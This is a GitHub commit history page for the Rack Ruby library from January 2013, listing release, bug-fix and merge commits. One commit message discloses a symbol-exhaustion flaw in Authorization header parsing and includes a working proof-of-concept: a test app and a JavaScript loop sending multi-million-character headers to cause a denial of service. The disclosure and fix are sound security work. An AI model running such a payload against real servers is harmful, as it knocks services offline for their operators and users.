Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP
Commits on Jan 22, 2013
  1. James Tucker
  2. James Tucker

    Update README for 1.5.0 release

    raggi authored
  3. James Tucker

    Switch to RFC 2822 expires

    raggi authored
Commits on Jan 21, 2013
  1. James Tucker

    Fix a long standing misnomer for date formats

    raggi authored
    References #414
  2. James Tucker
  3. James Tucker
  4. James Tucker

    Merge pull request #496 from homakov/patch-3

    raggi authored
    Remove never called string
Commits on Jan 14, 2013
  1. Egor Homakov

    Remove never called string

    homakov authored
    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
Commits on Jan 13, 2013
  1. James Tucker

    Update to 1.5.0.beta.2

    raggi authored
  2. James Tucker

    Update README security notes

    raggi authored
  3. James Tucker
  4. James Tucker

    Rack::Auth::AbstractRequest#scheme returns strings

    raggi authored
     * This is a breaking API change, but doesn't appear to be used in public
  5. James Tucker

    Squash test warnings

    raggi authored
  6. James Tucker
  7. James Tucker

    Squash warnings in spec_auth

    raggi authored
  8. James Tucker

    Reimplement auth scheme fix

    raggi authored
     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - users rails
     * Checked rack-authentication - does it's own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does it's own thing
     * Probably missed a bunch, but that'll have to do
  9. James Tucker

    Revert "Merge pull request #494 from homakov/patch-2"

    raggi authored
    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
  10. Konstantin Haase

    Merge pull request #494 from homakov/patch-2

    rkh authored
    Remove .to_sym in Authorization scheme
  11. Egor Homakov

    Remove .to_sym in Authorization scheme

    homakov authored
    Hello, `.to_sym` should never be applied on user input. Thus I recommend you to change `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send enourmous emount of `Authorization` headers we can make it as long as it's possible. 
    This is PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run JS every request carries 18888890 letters in a symbol. This 'data' will never be garbarge collectored.
    Should it be fixed?
Commits on Jan 11, 2013
  1. James Tucker

    Merge branch 'hijack'

    raggi authored
    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
  2. James Tucker
  3. James Tucker

    Add q-value helpers for Accept headers, etc.

    raggi authored
     * Supersedes and closes #443
  4. James Tucker
  5. James Tucker

    Minor code review comments closing #451

    raggi authored
     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
  6. James Tucker

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    raggi authored
    This reverts commit 3b24fa9.
  7. James Tucker

    Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/…

    raggi authored
    …rack into sendfile
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compaitiblity
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
  8. James Tucker

    Enable unix sockets with paths as trusted proxies

    raggi authored
     * Supersedes and closes #488
  9. James Tucker

    Merge pull request #491 from spastorino/allow_build_different_session…

    raggi authored
    …_object
    
    Allow subclasses build a different Session Object
  10. Santiago Pastorino
  11. James Tucker

    Merge pull request #490 from slivu/master

    raggi authored
    Added Reel Web Server and Espresso Framework to supported software list
  12. James Tucker

    Merge pull request #489 from spastorino/abstract_id_tiny_patches

    raggi authored
    Abstract id tiny patches
Commits on Jan 10, 2013
  1. Update README.rdoc

    slivu authored
  2. Santiago Pastorino
  3. Santiago Pastorino
  4. Santiago Pastorino
Something went wrong with that request. Please try again.